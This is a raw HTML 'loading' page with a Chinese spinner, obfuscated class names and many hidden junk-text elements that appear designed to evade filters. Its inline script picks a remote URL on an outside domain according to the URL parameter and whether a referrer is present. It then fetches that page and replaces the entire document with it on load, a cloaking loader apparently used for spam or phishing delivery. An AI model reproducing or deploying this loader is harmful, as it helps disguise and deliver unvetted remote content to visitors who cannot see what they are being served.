<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .g7Ao0Uapb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .g7Ao0Uapb .lUpHKtiwH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .g7Ao0Uapb .content {
            line-height: 50px;
            text-align: center
        }

        .g7Ao0Uapb .img {
            width: 100%
        }

        .g7Ao0Uapb .yXIrOpE1L2g {
            text-align: center
        }

        .g7Ao0Uapb .yXIrOpE1L2g span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .g7Ao0Uapb .yXIrOpE1L2g span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .g7Ao0Uapb .yXIrOpE1L2g span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .g7Ao0Uapb .yXIrOpE1L2g span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .g7Ao0Uapb .yXIrOpE1L2g span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .g7Ao0Uapb .yXIrOpE1L2g span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .g7Ao0Uapb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function djHv3vB6i(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iSINZ9t = djHv3vB6i('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iSINZ9t +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iSINZ9t +".html?a=share";
		}
		
        yhtDFq=url+"#"+new Date().getTime();
        yhtDFq && function() {
            $.get(yhtDFq, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >LQnSat6gSaOAyeCo</b>
<b style='display:none' >LQnSat6gSaOAyeCo</b>
<li style='display:none' >ILlTecUlgEOzFFbdXxTbYcRVozzOoeYYUpOPAHbK8923df0RN2HE6HSLRMMPt347bABCapnG0FrXKv4MgBcmwbLgHUu8CMi2</li><div class="g7Ao0Uapb">
    <div class="lUpHKtiwH">
        <div class="yXIrOpE1L2g">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >gBxSqP94fHXJdEP61lgmpsfegevkYi5jyviUlW4wsDrHJGm4vEm2vVu2S1VcTayIkHR61pcKsfVoCCTVxRqm2</b>
<a  href='#' style='display:none'>JDDXHQQqLf9fke2vM3ZKc92vsiPKa2535KmExu7dAYARsqq24eZP8n1BQDb62uUqwQGjXTPYJ</a>
<a  href='#' style='display:none'>JDDXHQQqLf9fke2vM3ZKc92vsiPKa2535KmExu7dAYARsqq24eZP8n1BQDb62uUqwQGjXTPYJ</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >LQWo0WBz4Ou4cgwJA</ul>
<img  src='' style='display:none'>
<div style='display:none'>pg1vHJ5pdyHXjIF8BJgFS46VdboHfJ4qrSHjmEcmhV26ckJoIKCLvzA2LKVKNsw49c1PYUAO6w2</div>
<div style='display:none'>pg1vHJ5pdyHXjIF8BJgFS46VdboHfJ4qrSHjmEcmhV26ckJoIKCLvzA2LKVKNsw49c1PYUAO6w2</div>
<ul style='display:none' >LQWo0WBz4Ou4cgwJA</ul></body>
</html>